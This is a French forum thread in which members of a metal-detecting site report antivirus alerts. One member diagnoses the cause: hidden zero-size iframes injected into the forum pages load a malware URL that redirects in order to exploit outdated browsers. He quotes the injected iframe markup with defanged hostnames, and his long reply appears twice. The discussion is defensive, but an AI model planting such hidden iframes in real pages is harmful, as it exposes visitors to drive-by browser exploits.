virus
MessagePublié :28 mars 2010, 12:47
nouvelle attaque de virus,il y a 5 minutes,ca n'arrete pas depuis 2 jours .salut a+
Detecteur.net
Forum des particuliers sur le détecteur de métaux et la détection de loisir
https://www.detecteur.net/forum/
virus
Page 1 sur 1
Re: virus
MessagePublié :28 mars 2010, 12:53
mème chose pour moi !je ferme !
Re: virus
MessagePublié :28 mars 2010, 13:01
cheval de troie!!!
Re: virus
MessagePublié :28 mars 2010, 13:28
Apparemment c'est toutes les pages du forum car même l'index m'affiche un message d'alerte d'Avira security suite avec pour cause: HTML/Infected.WebPage.Gen
Re: virus
MessagePublié :28 mars 2010, 13:28
aucun soucis pour moi .... 
Re: virus
MessagePublié :28 mars 2010, 13:30
Ce matin, avast m'a dit une fois, cheval de troie :-o
Re: virus
MessagePublié :28 mars 2010, 13:49
salut
virus internet bloqué a l"instant !!!!
virus internet bloqué a l"instant !!!!
Re: virus
MessagePublié :28 mars 2010, 13:52
plus d'accès à dautres foras de détect n on plus,s'agirait il d'une attaque de grande envergure ?? 
Re: virus
MessagePublié :28 mars 2010, 13:55
A chaque fois que je change de page, Avast dit, "ADRESSE URL MALVEILLANTE BLOQUé" 
Re: virus
MessagePublié :28 mars 2010, 14:21
Les antivirus aiment pas du tous les iframes en général car c'est des vecteurs d'attaques Web.
Rien à voir avec les virus classiques qui massacrent votre système ou qui installent un cheval de troie.
En général c'est plus pour récupérer des identifiants / mots de passe Web, faire du phishing, gagner des visites pour de la pub ou rediriger sur un site malicieux pour exploiter un navigateur Web pas à jour et exécuter du code sur votre ordi (pour le coup).
Pas péril en la demeure, dès que les antivirus voient une iframe qui n'est pas du site, paf une alerte se lève. En regardant en 2sec le code source, on voit des iframes qui vont sur ramualdo.com.
<iframe src="hxxp://ramualdo.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="hxxp://ramualdo.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe></div></div>
hxxp://ramualdo.com/lib/index.php" onclick="window.open(this.href);return false; redirige sur hxxp://convart.com/start.php" onclick="window.open(this.href);return false; qui redirige sur google avec des balises scripts qui font peur aux antivirus. En cherchant un peu sur google ramualdo.com est toutefois mis comme "Malware URL". http://safebrowsing.clients.google.com/ ... /index.php" onclick="window.open(this.href);return false;
A priori ça essaye d'exploiter des navigateurs pas à jour. Si vous avez du Windows classique et que vous avez les correctifs automatiques, pas de problèmes vous ne risquez rien.
Après pour ce qui est de cette iframe, y'a moyen que le forum (phpBB) ne soit pas totalement à jour et que des scripts automatisés sur le net réalisent ce genre d'attaques. Ca peut aussi être un plugin pas à jour.
On peut voir ces attaques dans les logs d'Apache ou d'IIS assez facilement, je veux bien aider à les trouver si on me les envoie.
Rien à voir avec les virus classiques qui massacrent votre système ou qui installent un cheval de troie.
En général c'est plus pour récupérer des identifiants / mots de passe Web, faire du phishing, gagner des visites pour de la pub ou rediriger sur un site malicieux pour exploiter un navigateur Web pas à jour et exécuter du code sur votre ordi (pour le coup).
Pas péril en la demeure, dès que les antivirus voient une iframe qui n'est pas du site, paf une alerte se lève. En regardant en 2sec le code source, on voit des iframes qui vont sur ramualdo.com.
<iframe src="hxxp://ramualdo.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="hxxp://ramualdo.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe></div></div>
hxxp://ramualdo.com/lib/index.php" onclick="window.open(this.href);return false; redirige sur hxxp://convart.com/start.php" onclick="window.open(this.href);return false; qui redirige sur google avec des balises scripts qui font peur aux antivirus. En cherchant un peu sur google ramualdo.com est toutefois mis comme "Malware URL". http://safebrowsing.clients.google.com/ ... /index.php" onclick="window.open(this.href);return false;
A priori ça essaye d'exploiter des navigateurs pas à jour. Si vous avez du Windows classique et que vous avez les correctifs automatiques, pas de problèmes vous ne risquez rien.
Après pour ce qui est de cette iframe, y'a moyen que le forum (phpBB) ne soit pas totalement à jour et que des scripts automatisés sur le net réalisent ce genre d'attaques. Ca peut aussi être un plugin pas à jour.
On peut voir ces attaques dans les logs d'Apache ou d'IIS assez facilement, je veux bien aider à les trouver si on me les envoie.